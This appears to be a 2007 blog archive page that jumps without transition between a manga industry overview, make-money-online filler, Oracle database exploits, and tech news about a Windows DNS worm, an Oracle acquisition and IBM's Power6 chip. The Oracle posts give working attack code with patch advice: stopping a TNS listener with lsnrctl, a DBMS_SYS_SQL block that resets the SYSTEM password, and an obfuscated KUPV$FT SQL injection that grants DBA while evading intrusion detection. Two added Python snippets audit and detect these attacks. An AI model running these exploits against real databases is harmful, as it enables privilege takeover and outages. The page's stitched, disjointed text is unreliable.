May 24, 2007

The Rise of Japanese Manga Japan

Japan has become the world leader in comics. Japanese manga, as comics are called here, have been publicized the world over on television and in newspapers and the most popular works have been introduced abroad both through legal and pirate translations. But despite these efforts, they remain insufficient for foreign audiences wishing to acquire a comprehensive understanding of the genre. In the months that follow I intend to give a wide-ranging introduction to Japanese manga based on theme, but before I do I should like to begin with an overview of the basics.

There are a great number of magazines in Japan devoted exclusively to manga but it is difficult to give an exact accounting of their number given that it is not at all uncommon for smaller publishing houses to bring out one new magazine after another under different titles. The core of the manga publishing industry consists of some 13 weekly manga magazines published by the major publishers alone, along with 10 biweeklies, and approximately twenty influential monthlies. At any given time there are at least ten magazines which boast over one million copies of each issue. At most there is one non-manga magazine in Japan which can claim a readership of over one million.

Yearly sales of manga throughout the 1990's have been in the neighborhood of 600 billion yen, including 350 billion in magazine sales and 250 billion in paperbacks. These figures do not include sales of manga appearing in general magazines and newspapers. The total sales of published material in Japan (including magazines and books but excluding newspapers) is two trillion five-hundred billion yen, of which manga sales account for nearly one quarter. Given a total Japanese population of 120 million, we can calculate that the average Japanese spends approximately 2,000 yen per year on manga in one form or another.

The three largest publishing houses producing manga are Kodansha, Shogakkan, and Shueisha. In addition there are some ten odd publishing firms which come in at a close second, including Akita Shoten, Futabasha, Shonen Gahosha, Hakusensha, Nihon Bungeisha, and Kobunsha. This is not even to mention the countless other small-scale publishing firms. The larger publishers mentioned above also publish magazines and books in areas outside of manga.

It is estimated that there are around 3000 professional manga artists in Japan. All of these individuals have published at least one volume of manga, but most of them make their living as assistants to famous manga artists or have some other supplementary source of income. Only 300 of these, or ten percent of the total, are able to make an above-average living from manga alone. In addition, there are also a great number of amateur manga artists who produce small magazines intended for private circulation, called dojinshi

Making Money online by building a Website

Do you have a website and want to turn it into a money machine?
Making money online from a PC connected to the Internet at home by building a website has never been easier. When you build a website that has enough visitors, say 1000 visitors per day, you can make decent money from affiliate programs and from advertising agencies who advertise for their clients and look for publishers, i.e. websites on the Internet.

Work from home, make money from your Website, join affiliate programs, get paid to take online surveys, get paid by reading email, get paid by surfing the Web, money making tutorials, earn revenue by placing ads on your Website, advertisement programs, get a fee to refer customers, receive commission for offering custom builds, etc.

With affiliate programs (or associates, as some programs call them) you make money by referring your site's visitors to the affiliate program's website (e.g. amazon.com). Your site is given a special ID, and whenever a visitor of your site clicks on the affiliate ad, that ID is passed to the affiliate program manager. How you get paid differs from one affiliate to another.

Some affiliates pay you when your visitors buy products from their sites; others pay you for clicks on ads shown on your site.

This site will help you build your online business by showing you how and where to start this new venture in your life. We recommend assessing your own ability to build a website, and investigating buying one if your skills are more in marketing than in technical work.

Oracle Exploit stop TNS Listener via lsnrctl

If a TNS listener is not password protected, anyone can stop it (denial of service) by sending a STOP command to the TNS listener. This can be done with the lsnrctl command, the tnscmd perl script or via tnsnames.ora.

Even if your TNS listener is protected by a firewall and only accessible via HTTP (e.g. from an application server), it is possible to shut down the listener, e.g. via iSQLPlus or Oracle Forms, Oracle Reports ...

Example
-- use the IP address of the database server
lsnrctl stop 192.22.33.44

Solution
Protect your TNS Listener with a password and ADMIN_RESTRICTIONS in the listener.ora
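
One way to check a listener.ora for the two protections named above, as an added example that is not part of the original post. The sample file, host name and password hash are constructed, and the function names are hypothetical; the parameter names PASSWORDS_<listener> and ADMIN_RESTRICTIONS_<listener> are the standard listener.ora settings.

```python
import re

# Constructed sample listener.ora (not from the original page): LISTENER is
# protected, LSNR_TEST has no password and ADMIN_RESTRICTIONS switched off.
SAMPLE = """\
# constructed example
LISTENER =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost.example)(PORT = 1521)))
PASSWORDS_LISTENER = (0123456789ABCDEF)
ADMIN_RESTRICTIONS_LISTENER = ON

LSNR_TEST =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost.example)(PORT = 1522)))
admin_restrictions_lsnr_test = off
"""

def top_level_params(text):
    """Return {NAME: value} for every parameter at parenthesis depth 0."""
    text = re.sub(r"#.*", "", text)              # drop comments
    depth, depths = 0, []
    for ch in text:                              # nesting depth before each char
        depths.append(depth)
        depth += (ch == "(") - (ch == ")")
    hits = [m for m in re.finditer(r"([A-Za-z_]\w*)\s*=", text)
            if depths[m.start()] == 0]
    params = {}
    for m, nxt in zip(hits, hits[1:] + [None]):
        end = nxt.start() if nxt else len(text)
        params[m.group(1).upper()] = text[m.end():end].strip()
    return params

def audit(text):
    """Map each listener name to the list of protections it is missing."""
    params = top_level_params(text)
    findings = {}
    for name, value in params.items():
        if "ADDRESS" not in value.upper():       # only listener definitions
            continue
        issues = []
        if not params.get("PASSWORDS_" + name):
            issues.append("no listener password")
        if params.get("ADMIN_RESTRICTIONS_" + name, "").upper() != "ON":
            issues.append("ADMIN_RESTRICTIONS not ON")
        findings[name] = issues
    return findings

if __name__ == "__main__":
    for listener, issues in audit(SAMPLE).items():
        print(listener, "OK" if not issues else "; ".join(issues))
```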

Become DBA via Oracle DBMS_SYS_SQL in Oracle 8i / 9i / 10g

The following test case is from Oracle itself. A test case is nothing other than an exploit or proof-of-concept code. This test case allows a user to become DBA if execute permission on DBMS_SYS_SQL has been granted. By default only XDB has execute permission. Sometimes PORTAL30, PORTAL30_SSO and OAS_PUBLIC also have execute permission on DBMS_SYS_SQL.

Metalink note 112271.1 gives the following advice:

grant execute privileges on DBMS_SYS_SQL to the (default user) OAS_PUBLIC.

BE CAREFUL DOING THIS...

Example
declare
uid number;
sqltext varchar2(100) := 'alter user system identified by hacker';
myint integer;

begin
select user_id into uid from all_users where username like 'SYSTEM';

myint:=sys.dbms_sys_sql.open_cursor();
sys.dbms_sys_sql.parse_as_user(myint,sqltext,dbms_sql.native,UID);

sys.dbms_sys_sql.close_cursor(myint);
end ;
/

Solution
Never grant DBMS_SYS_SQL to public.

SQL Injection via Oracle KUPV$FT in Oracle 10g R1 with IDS evasion

The following proof-of-concept exploit code injects code for a privilege escalation (grant dba to public) via a cursor. The cursor is executed in the SYS context; it grants the DBA permission to public, and the privilege is revoked directly after that. The advantage of this approach is that the current session still has DBA privileges but this is not visible in the Oracle view DBA_ROLE_PRIVS.

If you compare this exploit code with the exploit from Andrea Purificato you will see that this exploit has fewer prerequisites (perl is not required, it works via iSQLPlus, and it is smaller) and adds IDS evasion.

Example -- with IDS evasion --
/

SQL> DECLARE
MYC NUMBER;
MYB BOOLEAN;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,translate('uzikpsz fsprjp pnmghgjgna_msphapimwgh) ozrwh zczinmz wjjzuwpmz (rsphm uop mg fnokwi()igjjwm)zhu)',
'poiuztrewqlkjhgfdsamnbvcxy()=!','abcdefghijklmnopqrstuvwxyz'';:='),0);
MYC:=SYS.KUPV$FT.ATTACH_JOB('',''' AND 1=dbms_sql.execute ('||myc||')--',myb);
END;
/

SQL> set role dba;

SQL> revoke dba from public;


SQL> select * from dba_role_privs where granted_role='DBA';

GRANTEE GRANTED_ROLE ADM DEF
------------------------------ ------------------------------ --- ---
SYS DBA YES YES
WKSYS DBA NO YES
SYSMAN DBA NO YES
SYSTEM DBA YES YES

Solution
Apply the patches mentioned in Oracle Critical Patch Update January 2006.
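
The IDS evasion in the example works because the keywords only appear after TRANSLATE has run inside the database. The following added example (not part of the original post) shows how a detection rule can decode all-literal TRANSLATE calls before matching signatures; the sample statement is the TRANSLATE call from the example above, and the function names and the two signatures are assumptions chosen for illustration.

```python
import re

# One single-quoted SQL literal; '' is the escaped quote.
LIT = r"'((?:[^']|'')*)'"
CALL = re.compile(r"translate\s*\(\s*" + LIT + r"\s*,\s*" + LIT +
                  r"\s*,\s*" + LIT + r"\s*\)", re.I)

# Statement text as a monitor would capture it (copied from the example above).
CAPTURED = """DBMS_SQL.PARSE(MYC,translate('uzikpsz fsprjp pnmghgjgna_msphapimwgh) ozrwh zczinmz wjjzuwpmz (rsphm uop mg fnokwi()igjjwm)zhu)',
'poiuztrewqlkjhgfdsamnbvcxy()=!','abcdefghijklmnopqrstuvwxyz'';:='),0);"""

# Hypothetical keyword signatures an IDS might apply to SQL text.
SIGNATURES = [re.compile(p, re.I)
              for p in (r"grant\s+dba\b", r"execute\s+immediate")]

def oracle_translate(expr, from_s, to_s):
    """Oracle TRANSLATE: from_s[i] -> to_s[i]; from_s chars past len(to_s) are deleted."""
    table = {}
    for i, ch in enumerate(from_s):
        table.setdefault(ch, to_s[i] if i < len(to_s) else "")  # first mapping wins
    return "".join(table.get(c, c) for c in expr)

def normalize(sql):
    """Replace each TRANSLATE call whose arguments are all literals with its result."""
    unquote = lambda s: s.replace("''", "'")
    return CALL.sub(
        lambda m: oracle_translate(*(unquote(g) for g in m.groups())), sql)

def alerts(sql, decode=True):
    """Return the signature patterns that match, optionally after decoding."""
    text = normalize(sql) if decode else sql
    return [s.pattern for s in SIGNATURES if s.search(text)]

if __name__ == "__main__":
    print("raw text:     ", alerts(CAPTURED, decode=False))
    print("after decode: ", alerts(CAPTURED))
```

This only covers TRANSLATE calls with literal arguments; strings assembled by concatenation or other functions need auditing on the database side, where the final statement is visible.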

May 23, 2007

Hackers Exploit Windows DNS Vulnerability

According to I.T. security firm Sophos, a worm is exploiting an unpatched zero-day vulnerability in the DNS services of several Windows operating systems.

Also known as Nirbot or Rinbot, the W32/Delbot-AI worm is taking advantage of a vulnerability in the way the Windows DNS Server's Remote Procedure Call (RPC) interface has been implemented. The hackers' worm has been able to exploit the flaw by sending a specially crafted RPC packet to vulnerable servers.

If the worm successfully infects a server, it allows hackers to gain control over the computer, giving them the ability to determine what it does and steal information from unsuspecting users. The worm also can exploit an old vulnerability present in Symantec's antivirus product line, which was patched a year ago.

Laying in Wait

Several security vendors have issued a workaround patch, but word from Microsoft on an official patch is sketchy.

"While we don't have a firm estimate on when we'll complete our development and testing of updates for this issue, we have teams around the world working on it 24 hours a day, and hope to have updates no later than May 8, 2007, for the May monthly bulletin release," Chris Budd, of the Microsoft Security Response Center, wrote in the corporate blog.

This flaw in Microsoft's code has only been known for a handful of days, and already there is a worm that is taking advantage of the problem in its attempt to infect as many computers as possible, noted Graham Cluley, senior technology consultant for Sophos.

"Time and time again hackers are forcing companies like Microsoft to scramble around to develop, test, and roll out a software patch," Cluley said in a statement. "Businesses should ensure that their computers are properly configured, and protected with up-to-date antivirus software, hardened firewalls, and patches."

A Watching Eye

The computer underground appears to be reveling in waiting until Microsoft has released its monthly batch of patches before unleashing its latest attacks, continued Cluley. "Microsoft will not be enjoying having the security of their software brought into question again," he concluded.

While the current worm exploits are unsophisticated, there is considerable danger that more sophisticated attacks could be in the works, according to Paul Zimski, PatchLink's director of product and market strategy. PatchLink, whose customers include KPMG, Wells Fargo, and Yahoo, has issued an emergency patch ahead of the official Microsoft fix.

"The DNS servers are a particularly high-value target because a hacker that 'owns' DNS servers can do a 'man in the middle' attack," Zimski said. "While this attack isn't going to hit every desktop, it is very serious."

Oracle Buys Agile in Chess Game with SAP

Enterprise solutions giant Oracle announced Tuesday that it is enlarging its corporate family with the purchase of Agile Software, a company that provides product-lifecycle management (PLM) software.

The acquisition is yet another that Oracle has made in the past few years, buying companies, such as PeopleSoft, to expand its suite of enterprise solutions and to position itself in its rivalry with SAP.

The Agile deal involves a cash merger of $8.10 per share, worth about $495 million.

Managing Products

Engineers, manufacturing, and supply-chain professionals use Agile's solutions to collaborate across the supply chain and to help manage product innovation and product introductions.

The company said in a statement that its products "help customers make better product portfolio decisions, accelerate new product introduction, improve manufacturing quality, and manage regulatory compliance." Regulation compliance includes following rules from the U.S. Food and Drug Administration and the European Union, among others.

The addition of PLM to its suite of enterprise tools will help Oracle further its "strategy of delivering industry-specific enterprise applications," Oracle President Charles Phillips said in a statement. He added that PLM was "one of the fastest growing application segments" and that Agile will "serve as the foundation of our PLM offering."

In an indication of the move's importance in the corporate chess game with SAP, Phillips said that the purchase will "offer yet another strategic application to SAP customers."

SAP's Own Buying Spree

SAP has been on its own strategic buying spree as it also fills out its suite of enterprise solutions. On Monday, it announced that it intended to acquire MaXware and Wicom Communications.

Wicom provides contact center and other business communication software that is entirely IP-based. The current worldwide business environment, SAP said, involves customers connecting through many channels, and the Wicom acquisition can "deliver a multichannel, all-IP, end-to-end contact center solution, integrating communication processes into customer service."

MaXware, this week's other announced purchase by SAP, currently provides services to about 300 customers worldwide. It offers identity management as a service, specializing in standards-based accessibility to confidential information that could reside in several repositories. In particular, it provides identity management in a service-oriented architecture (SOA) world, where a person can have access to many applications across several layers, sometimes only temporarily.

And, last week, SAP announced it is buying OutlookSoft, a performance-management software company.

The Oracle-SAP rivalry extends beyond just competing acquisitions. In March, Oracle sued SAP for stealing copyrighted software. The 43-page suit, filed in U.S. District Court in San Francisco, claimed that the German company repeatedly obtained unauthorized access to its password-protected Web site, using customers' access codes.

IBM Launches Fastest Processor Ever

IBM broke another chip record Monday and played to its strength in high-performance servers, launching the dual-core Power6 processor. Running at 4.7 GHz, the Power6 is twice as fast as the previous generation of Power5 processors, and is being called the fastest microprocessor ever made.

The Armonk, New York-based company said that the 65-nm Power6 chip uses about the same amount of electricity as its predecessor, meaning that data centers can cut their power use for the same performance, or double the performance at the same power.

The Power6 has a processor bandwidth of 300 GB/sec, Big Blue said, noting that this rate could allow the entire iTunes catalog to be downloaded in 60 seconds. According to IBM, that speed is some 30 times faster than the iTunes-downloading capability of the Intel Itanium processor, which peaks at 1.66 GHz.

IBM's Big Iron Heritage

This kind of "big iron" is IBM's heritage, said Martin Reynolds, an analyst with industry research firm Gartner. The Power6 strengthens IBM's strong position for very high-performance microprocessors for data centers, he said, where Big Blue remains in first place ahead of Sun and Hewlett-Packard.

At the same time that the Power6 was launched, IBM introduced a new 2- to 16-core server, called the IBM System p 570. That server, using the new Power6 chip, placed first in four common Unix benchmarks that measure integer calculations common in business, floating-point calculations used in scientific research, Java performance, and transaction processing.

"This is the first time that a single system has owned all four categories," IBM said.

Green Technology

Electrical power and cooling requirements for data centers are increasingly important issues. The new chip is being touted in some quarters as "green" technology because of its ability to offer faster speeds without drawing more electricity than the earlier Power chips.

Additionally, when the full capabilities of the Power6 are not being used, the chip can be dynamically scaled down and then restored when needed. The chip design also allows it to operate at low voltages, so it can be used in low-power blade servers as well as other environments.

Reynolds expressed reservation about how much power will actually be saved, although he did note that one area of conservation might be that tasks formerly requiring many servers could now be consolidated. IBM claims that the workload of 30 SunFire v890 servers can now be accommodated by one System p 570.

The processing capability of the new chip is due to several advances, IBM said, including a balanced scaling of cache sizes. "The Power6 chip has a total cache size of 8 MB per chip -- four times the Power5 chip," the company said. This allows data to be fed "to the chip at a rate that takes advantage of the processor's speed."

Other firsts that IBM cited include the Power6 being the first Unix microprocessor that uses hardware calculation for decimal floating-point arithmetic. Previously executed in software, this kind of calculation impacts the processing of complex tax or other financial programs.